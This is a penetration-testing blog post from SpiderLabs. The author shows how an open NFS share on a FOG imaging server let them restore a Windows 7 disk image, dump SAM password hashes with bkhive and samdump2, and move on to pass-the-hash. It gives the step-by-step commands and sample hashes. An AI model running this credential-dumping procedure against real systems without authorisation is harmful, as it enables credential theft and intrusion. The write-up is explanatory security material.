Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

OS Image Wrangling

On most PenTests, alot of research goes into the things you find along the way. You find obscure software and other setups that can be a goldmine if you spend the time to do some research. On a recent test, I came across a FOG Server install. FOG is a open-source cloning setup, much like Norton Ghost. It pulled its images from a NFS share, and I just so happened to be in the /24 that was allowed to access it.

I mounted the NFS share and began to poke around. I found a Win7 folder with an image file in it:
/mnt# ls /WKSTNWin7d1.mbr  d1p1.img

I pulled the image file down to my box and did some analysis. It looks like FOG can use Partimage for creating and restoring partitions. Trusty 'file' confirmed this:

$ file sys.img.000 sys.img.000: PartImage file version 0.6.1 volume 0 type ntfs device /dev/sda2, original filename pigz2, not compressed

After some reading on Partimage, I devised a way to mount the image. First, I had to create a blank image file the same size as the partition:

$ dd if=/dev/zero of=disk.img bs=1M count=1722217222+0 records in17222+0 records out18058575872 bytes (18 GB) copied, 202.771 s, 89.1 MB/s

Then I assigned that file to a loopback device:

$ sudo losetup -f --show disk.img /dev/loop2

Then I installed Partimage, and used it to recover the Win7 image to the loopback device:

$ sudo partimage restore /dev/loop5 sys.img.000


This took quite a while, as the image was an entire 16GB NTFS disk image. Once Partimage finished doing its magic, I was able to just mount the loopback device as a NTFS partition:

$ sudo mount -t ntfs /dev/loop2 ./img

At this point, I was able to browse the filesystem. Excellent! Of course, the first place I head is to where the Registry stores its goodies, and used bkhive to dump the syskey bootkey from the SYSTEM hive:

/tmp/img/Windows/System32/config/RegBack$ bkhive SYSTEM keybkhive 1.1.1 by Objectif Securitehttp://www.objectif-securite.choriginal author: ncuomo@studenti.unina.itRoot Key : CMI-CreateHive{F10156JA-9DA3-4EDS-966E-5J29D135544}Default ControlSet: 001Bootkey: c612713d2aac9a51cd56b1ef6a62637f

Then I used samdump2 in conjunction with the bootkey and the SAM hive to dump the local usernames and password hashes:

/tmp/img/Windows/System32/config/RegBack$ samdump2 SAM keysamdump2 1.1.1 by Objectif Securitehttp://www.objectif-securite.choriginal author: ncuomo@studenti.unina.itRoot Key : CMI-CreateHive{655441A9-11D8-66B8-HEHK-3044323D5DEDSC}Administrator:500:aad3b435b51404eeaad3b435b51404ee:cbd7c6f3abd1cf5ef9b8645d1a96568e:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Blamo! Mix 1 part luck with 2 parts Pass the Hash, and you've got shells on half a dozen boxes ;)